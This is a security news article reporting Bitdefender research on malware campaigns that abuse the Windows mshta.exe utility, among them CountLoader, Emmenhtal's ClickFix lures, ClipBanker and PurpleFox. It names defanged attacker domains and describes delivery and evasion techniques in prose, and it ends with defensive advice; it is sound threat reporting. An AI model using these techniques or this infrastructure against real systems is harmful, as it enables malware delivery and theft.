Microsoft’s legacy mshta.exe utility remains widely abused in malware campaigns despite the retirement of Internet Explorer and Microsoft’s ongoing deprecation of older scripting technologies.
Bitdefender Labs reports a notable rise in detections involving mshta.exe over recent months, suggesting that attackers are increasingly relying on the LOLBIN (Living-off-the-Land binary) as legitimate enterprise use steadily declines.
MSHTA was originally tied to Internet Explorer and HTML Applications (HTA), but it remains included by default in Windows. Because the binary is Microsoft-signed and trusted by many security products and enterprise environments, attackers use it to blend malicious activity with legitimate system operations. Bitdefender says the tool is especially attractive because it can retrieve remote payloads, execute scripts in memory, and hand off execution to PowerShell or other Windows components without dropping obvious malware files onto disk.
Abuse of MSHTA in the wild
One of the largest infection clusters involved CountLoader, an HTA-based loader used to deliver LummaStealer and Amatera. Victims were lured through cracked software websites, SEO poisoning, and social media posts advertising pirated applications. Download archives contained a disguised Python interpreter, malicious Python scripts, and a renamed MSHTA executable called iso2022.exe.
The malicious Python script generated obfuscated command lines that launched MSHTA against attacker-controlled infrastructure using domains masquerading as legitimate services hosted on .cc domains, including google-services[.]cc and memory-scanner[.]cc. The HTA payload was then decoded and used to launch additional malware stages. Bitdefender said the infrastructure later evolved to use .vg and .gl domains such as explorer[.]vg, ccleaner[.]gl, and microservice[.]gl.
Bitdefender
Another campaign analyzed by the researchers involved Emmenhtal Loader, which used ClickFix-style social engineering attacks distributed through Discord phishing messages. Victims were directed to fake CAPTCHA pages designed to copy malicious commands into the clipboard and trick users into manually executing them via the Windows Run dialog.
The malicious command launched mshta.exe against a remote HTA file disguised as media content, such as .mp4 files hosted on Alibaba Cloud infrastructure. The HTA payload operated entirely in memory, using hidden 1×1-pixel windows and Base64-obfuscated JavaScript loaders that eventually executed PowerShell commands. Those scripts downloaded additional payloads and executed .NET assemblies directly in memory, including LummaStealer samples containing known command-and-control infrastructure.
Bitdefender also documented MSHTA abuse in ClipBanker campaigns targeting cryptocurrency users. In those attacks, remote HTA scripts launched hidden PowerShell commands that downloaded secondary payloads designed to establish persistence, disable defenses, and replace cryptocurrency wallet addresses copied to the clipboard. The malware used scheduled tasks with names mimicking legitimate Windows services to avoid detection.
More advanced malware families are also relying on the utility. The researchers observed PurpleFox operators using MSHTA to launch msiexec commands that downloaded MSI installers disguised as PNG image files. Once installed, PurpleFox deployed a rootkit-enabled backdoor capable of persistence, remote command execution, information theft, and DDoS functionality.
Bitdefender says users should not assume all MSHTA usage is malicious, noting that some older software packages and administrative scripts still rely on it for automation tasks. However, the company recommends that organizations phase out the utility wherever possible, block or restrict mshta.exe and wscript.exe if they are no longer needed.
Leave a Reply